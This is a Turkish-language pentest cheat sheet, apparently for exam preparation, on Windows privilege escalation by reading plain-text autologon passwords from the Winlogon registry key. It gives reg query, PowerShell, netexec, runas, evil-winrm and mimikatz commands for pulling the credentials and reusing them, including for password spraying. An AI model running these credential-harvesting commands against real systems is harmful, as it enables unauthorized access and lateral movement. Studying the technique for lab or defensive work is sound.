FOOTHOLD Metodoloji Cheat-sheet
PrivEsc ✓ EXAM-SAFE kolay

Autologon — Winlogon DefaultPassword Registry'den Parola

Otomatik oturum acma (autologon) yapilandirilmis sistemlerde Winlogon registry anahtari DefaultUserName, DefaultPassword ve DefaultDomainName degerlerini cogu zaman acik metin olarak saklar; bu, dusuk yetkili kullanici tarafindan okunarak ayricalikli hesabin parolasini verir.

Bilgi: ÖN KOŞULLAR
  • Dusuk yetkili shell
  • Winlogon registry anahtarini okuma izni (genelde herkese acik)
┌──

Komutlar

cmd ✓ EXAM-SAFE user
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
Winlogon anahtarinin tum degerlerini dök (DefaultUserName/Password/Domain ara) HackTricks — Windows Local Privilege Escalation (Winlogon credentials)
cmd ✓ EXAM-SAFE user
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
Dogrudan acik metin DefaultPassword degerini sorgula HackTricks — Windows Local Privilege Escalation
powershell ✓ EXAM-SAFE user
Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' | Select-Object DefaultUserName,DefaultDomainName,DefaultPassword,AutoAdminLogon
PowerShell ile autologon alanlarini tek seferde topla HackTricks — Windows Local Privilege Escalation
netexec ✓ EXAM-SAFE user
netexec smb {{RHOST}} -u {{USER}} -p {{PASS}} -M autologon
Uzaktan SMB uzerinden autologon kimlik bilgilerini cek NetExec Wiki — autologon module
cmd ✓ EXAM-SAFE user
runas /user:RECOVERED_USER cmd.exe
Elde edilen kullanici/parola ile yuksek yetkili shell ac HackTricks — Windows Local Privilege Escalation
evil-winrm ✓ EXAM-SAFE user
evil-winrm -i {{RHOST}} -u {{USER}} -p {{PASS}}
Autologon parolasi local admin ise WinRM ile uzaktan giris yap HackTricks — WinRM

Genel Bakis

Kiosk makineleri, demo sistemleri veya kullanim kolayligi icin yapilandirilmis bircok Windows host’unda otomatik oturum acma (autologon) etkindir. Bu durumda Windows, oturumu acacagi hesabin kullanici adini ve parolasini Winlogon registry anahtarinda saklar. Parola cogu zaman acik metin (DefaultPassword) olarak durur ve bu anahtar varsayilan olarak dusuk yetkili kullanicilar tarafindan okunabilir.

Tespit / Enumerasyon

Kritik anahtar: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon. Ilgili degerler:

  • AutoAdminLogon = 1 ise autologon etkindir.
  • DefaultUserName / DefaultDomainName — hesap.
  • DefaultPassword — acik metin parola (mevcutsa altin).

Tum anahtari reg query ile dökerek bu alanlari arayin. winPEAS bunu Looking for AutoLogon credentials basligi altinda otomatik raporlar. Uzaktan kimlik bilginiz varsa netexec ... -M autologon ile de cekebilirsiniz.

Sömürü

Elde edilen kullanici adi/parola ile:

  1. runas /user:... ile lokal olarak yuksek yetkili shell acin.
  2. Hesap local admin ise evil-winrm veya RDP ile uzaktan giris yapin.
  3. Domain hesabi ise bu kimlik bilgileriyle AD enumerasyonuna (BloodHound, netexec) gecin.

Notlar

  • Bazen DefaultPassword silinmis olsa da parola LSA Secrets icinde DefaultPassword adiyla kalir; admin/SYSTEM iseniz impacket-secretsdump veya mimikatz lsadump::secrets ile cekilebilir.
  • Bulunan parola sik sik baska hesaplarda/sistemlerde tekrar kullanilir; password spray icin not edin.
┌──

Kaynaklar

↗ HackTricks — Windows Local Privilege Escalation (Winlogon Credentials)↗ NetExec Wiki — autologon moduleMicrosoft Docs — Turn on automatic logon (Winlogon)
0/15 set